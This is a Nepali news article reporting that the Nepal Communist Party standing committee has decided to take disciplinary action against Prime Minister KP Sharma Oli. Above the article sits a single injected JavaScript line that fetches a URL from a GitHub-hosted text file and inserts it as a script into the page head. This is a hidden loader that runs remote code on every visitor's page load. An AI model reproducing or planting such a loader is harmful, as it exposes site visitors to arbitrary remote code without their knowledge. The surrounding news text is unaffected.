;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
पुस ५,
काठमाण्डाै । नेपाल कम्युनिस्ट पार्टी (नेकपा) को स्थायी कमिटीको बैठकले प्रधानमन्त्री केपी शर्मा ओलीलाई अनुशासनको कारबाही गर्ने निर्णय गरेको छ ।
बालुवाटारमा बसेको बैठकले ओलीले लोकतन्त्रविरोधी र निरङ्कुश कदम चालेकाले उहाँलाई कारबाही गर्ने निर्णय गरेको कमिटी सदस्य अष्टलक्ष्मी शाक्यले जानकारी दिए ।
ओलीलाई कारबाही गर्ने निर्णय ७ गते बस्ने केन्द्रीय समितिको बैठकमा पेस गरिने पनि उहाँले जानकारी दिए । १० गते बस्ने भनिएको केन्द्रीय समितिको बैठक ७ गतेलाई बोलाइएको छ ।
यस्तै पूर्वसभामुख कृष्णबहादुर महरालाई स्थायी कमिटीको सदस्यमा नियुक्त गर्ने पनि बैठकले निर्णय गरेको छ ।
पछिल्लो घटनाक्रमका बारेमा छलफल गर्न ६ गते सोमबार संसदीय दल र स्थायी कमिटीको बैठक बोलाइएको पनि नेतृ शाक्यले जानकारी दिए ।
स्थायी कमिटीकाे आजकाे बैठकमा ओली पक्षका कुनै पनि नेताकाे सहभागिता थिएन ।
फेसबुक प्रतिक्रियाहरु